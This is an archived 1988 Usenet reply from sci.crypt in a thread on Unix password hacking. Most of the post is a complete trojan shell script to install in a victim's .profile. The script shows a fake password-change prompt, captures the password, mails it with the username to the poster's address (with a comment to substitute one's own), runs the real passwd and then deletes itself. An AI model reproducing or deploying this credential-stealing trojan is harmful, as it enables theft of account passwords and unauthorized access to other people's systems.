Path: utzoo!mnetor!uunet!lll-winken!lll-lcc!lll-tis!ames!ll-xn!husc6!cmcl2!brl-adm!brl-smoke!gwyn
From: gwyn@brl-smoke.ARPA (Doug Gwyn )
Newsgroups: sci.crypt
Subject: Re: Unix Password Hacker
Message-ID: <7348@brl-smoke.ARPA>
Date: 25 Feb 88 19:24:43 GMT
References: <731@ddsw1.UUCP> <657@morningdew.BBN.COM> <1368@homxc.UUCP> <739@ddsw1.UUCP> <1118@uop.edu> <2584@crash.cts.com>
Reply-To: gwyn@brl.arpa (Doug Gwyn (VLD/VMB) <gwyn>)
Distribution: na
Organization: Ballistic Research Lab (BRL), APG, MD.
Lines: 18

In article <2584@crash.cts.com> jkimble@crash.CTS.COM (Jim Kimble) writes:
>All this would really do is give you an additional UNIX account for a week
>or two.  I doubt the students have any more access then anyone else.

# .profile replacement -- install this in the victim's home directory
stty -echo
echo 'For security, you must change your password immediately.'
echo "Changing password for $LOGNAME."
echo 'Old password:\c'
read pwd
echo 'New password:\c'
read pwd
echo 'Retype new password:\c'
read pwd
echo $LOGNAME $pwd | mail Gwyn@BRL.MIL	# substitute your address
echo 'Mismatch - try again.'
stty echo
passwd			# this one is for real
mv ..profile .profile	# make this sneaky file go away